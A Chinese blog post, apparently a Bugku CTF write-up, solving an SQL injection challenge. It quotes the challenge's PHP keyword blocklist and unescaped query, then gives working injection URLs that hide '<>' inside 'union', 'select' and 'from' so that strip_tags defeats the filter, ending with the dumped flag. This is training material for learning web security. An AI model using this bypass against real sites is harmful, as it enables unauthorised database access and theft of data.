bugku SQL注入测试

最新推荐文章于 2024-06-25 17:25:15 发布
最新推荐文章于 2024-06-25 17:25:15 发布
阅读量3.3k 收藏 1
点赞数 1
文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anjiaowangmenghan/article/details/76445424
版权


SQL注入测试

访问参数为:?id=x

查找表为key的数据表,id=1值hash字段值

以下为其中一段代码:

//过滤sql
$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value)
{
	if (substr_count($id, $value) > 0)
	{
		exit('包含敏感关键字!'.$value);
	}
}

//xss过滤
$id = strip_tags($id);

$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";

当前结果:

id 1
title title
首先我们分析这一题代码审计 把常用的关键字都过滤掉了,一时没有看到什么方法,但是我们注意到了代码中有个strip_tags函数 于是我们去百度查下它的作用:

定义和用法

strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。

注释:该函数始终会剥离 HTML 注释。这点无法通过 allow 参数改变。

注释:该函数是二进制安全的。

明白了这个函数的作用就简单了 这个函数会剥离html标签 所以我们只用写注入语句时加入html标签就可以绕过注入检测

所以步骤如下:

1.首先判断有多少列

http://103.238.227.13:10087/?id=1%20unio%3C%3En%20%20sele%3C%3Ect%201,2%23

通过测试可知一共有两列

2.爆出数据库名字

http://103.238.227.13:10087/?id=1%20unio%3C%3En%20%20sele%3C%3Ect%20database(),2%23

通过这一步可以得到数据库名字为sql3

3.搜到flag

http://103.238.227.13:10087/?id=1%20unio%3C%3En%20%20sele%3C%3Ect%20hash,2%20fro%3C%3Em%20%20sql3.key%23

得到flag为c3d3c17b4ca7f791f85e#$1cc72af274af4adef

如有疑问请联系QQ:834368404

俺叫王梦涵
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入测试
zx66661的博客
04-04 439
22江西sql注入
BugkuCTF sql注入
weixin_34413065的博客
05-04 300
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 点开链接一看 很明显可以看出查询key表,id=1的string字段 我们去构造payload: http://103.238.227.13:10083/inde...
渗透测试SQL注入
CheatMyself的博客
06-25 1781
按照攻击类型分为:联合查询注入、布尔注入、时间延迟注入、报错型注入、堆叠型注入等按照注入位置分为:HTTP头注入、请求参数注入等按照数据库场景分为:MySQL注入、MSSQL注入、Oracle场景注入。
Bugku WEB sql注入
qq_41696858的博客
07-27 556
明显的布尔盲注。md5值和之前的一样,bugkuctf 这题也是过waf题,具体过滤了哪些字符可以用burpsuite跑个字典看看。 然后就是#,substr这两个关键的函数没有进行过滤,那么可以根据这个构造payload,由于空格被过滤了,所以,考虑用()代替空格 把上一题的脚本改改,爆破出密码来,那就可以直接提交得到flag了 import requests #password一般由大小写字母和数字组成 allString = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJK
sql注入检测
02-02
sql注入字典,比较普遍,建议下载试用下,有啥好的意见可以分享下
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
bugku web题INSERT INTO注入.docx
05-16
本文档中的“bugku web题INSERT INTO注入”是一个典型的利用SQL注入漏洞进行攻击的例子。题目提供了一个简单的PHP程序,通过分析该程序可以学习如何发现并利用HTTP头部`X-Forwarded-For`中的SQL注入漏洞。 #### 二...
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
2. **测试逻辑运算符**:输入`1' OR 1=1#`和`1' AND 1=2#`,若前者正确后者错误,表明存在SQL注入。 3. **判断列数**:使用`ORDER BY`语句,如`1' ORDER BY 1,2,3,4,5#`,直到报错为止,得知列数为4。 4. **查找显...
sqli-labs(php7.3以上可运行)
01-29
在sqli-labs中,你可以扮演黑客的角色,尝试找出并利用SQL注入漏洞,这有助于提升你的安全意识和测试技能。渗透测试工具如Burp Suite、Sqlmap等,可以辅助进行自动化扫描和漏洞利用。 五、漏洞环境 sqli-labs提供了...
bugkuctf解题-WEB
05-04
常见的攻击方式包括SQL注入、XSS(跨站脚本攻击)、CSRF(跨站请求伪造)、文件包含漏洞、命令注入等。对于这些攻击,我们需要了解它们的工作原理和防御措施。 1. SQL注入:当用户输入的数据未经有效过滤或转义就...
SQL注入测试工具,sqlmap工具
05-14
渗透测试SQL漏洞,sqlmap工具;渗透测试SQL注入测试工具。
安全测试sql注入
jiayue的博客
05-14 8504
目录1. 概述1.1 web安全渗透测试分类web数据库安全(sql注入漏洞)web应用服务器安全(文件上传漏洞,文件包含漏洞)web客户端安全(XSS跨站攻击)1.2 sql注入原理1.3 sql注入危害1.4 sql注入实现方式手动实现sql注入工具自动实现sql注入2. 安全渗透环境搭建3. 实操3.1 预备知识操作数据库操作表基本语句-查询UNION语句特殊库sql注释sql注入流程3.2 手动注入环境准备查找注入点逻辑或应用案例字段数限制3.3 自动注入工具搭建环境sqlmap基本用法案例 1.
安全测试-SQL注入
qq_42008891的博客
03-08 1408
SQL注入是针对一种数据库而言的,而不是针对网页语言。在任何使用了数据库查询环境下都可能存在。常见的数据库包括:MySQL、Oracle、Db2等。针对不同的数据库系统使用的一些函数会有所不同,不过从测试是否存在SQL注入的角度考虑,只需要进行几个最基本的判断语句就可以了。由于SQL注入有可能造成信息泄漏,在严重情况下(根据使用的数据库而定)甚至可能造成数据修改、删除,从而导致业务中断。因此必须发现所有存在的注入点。
bugku-web-SQL注入
qq_75121443的博客
04-18 177
这里利用ASCII码对数据库名称进行提取,得到第一个为ASCII码99,得到为字母b。得到=、空格、and、+、,、()等关键字全被过滤。这里稍微测试后,直接得到正确账号名admin。这也太过分了,连逗号都过滤了。,可以使用from(1)解决。以此继续,得到password。空格可以使用or()解决。
渗透测试sql注入
weixin_46420165的博客
12-08 2187
SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
渗透测试-SQL注入
weixin_53696027的博客
02-05 2408
sql注入是渗透测试重要的一部分,如果服务器存在sql注入漏洞将面临严重的威胁
个人笔记-渗透测试-SQL注入
weixin_48162696的博客
05-20 891
SQL注入原理,sql注入的数据类型,sql注入的提交方式,手工注入,sqlmap,基础防御,
SQL注入模糊测试关键字大全
"该资源提供了一组用于SQL注入测试的FUZZ关键字字典,包括逻辑运算符、比较操作符、特殊字符、SQL语句关键字等,适用于进行安全审计和漏洞探测。" SQL注入是一种常见的网络安全攻击手段,通过在应用程序的输入字段...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值